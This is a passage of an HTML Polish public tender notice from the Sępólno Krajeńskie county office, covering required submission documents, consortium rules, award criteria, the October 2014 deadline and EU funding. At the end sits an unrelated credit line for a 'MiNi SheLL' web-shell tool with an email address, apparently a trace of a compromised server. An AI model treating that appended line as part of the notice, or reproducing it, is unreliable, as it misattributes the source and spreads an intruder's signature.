3. Pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba nie uprawniona do reprezentowania Wykonawcy (zgodnie z odpisem z Krajowego Rejestru Sądowego lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej) - w formie oryginału lub kopii poświadczonej notarialnie. 
4. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków - w formie oryginału. 
5. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia: 
a) W przypadku Konsorcjum należy dołączyć pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy zgodnie z pkt. 6.4.3., ewentualnie w przypadku spółki cywilnej - umowa spółki cywilnej określająca prawo do reprezentacji. Z pełnomocnikiem tym będzie prowadzona wszelka korespondencja wiążąca dla wszystkich członków Konsorcjum, 
b) Dokumenty wymagane w pkt 6.2. winien złożyć każdy Wykonawca, 
c) Pozostałe dokumenty oraz oświadczenie z art. 22 ust. 1 ustawy Prawo zamówień publicznych mogą być złożone wspólnie przez Wykonawców lub oddzielnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Staż pracy - 20</li>
<li>3 - Stopień awansu zawodowego - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-sepolno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Sępólnie Krajeńskim - ul. Kościuszki 11, 89-400 Sępólno Kraj..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2014 godzina 09:00, miejsce: Starostwo Powiatowe w Sępólnie Krajeńskim - ul. Kościuszki 11, 89-400 Sępólno Kraj..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej realizowany w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com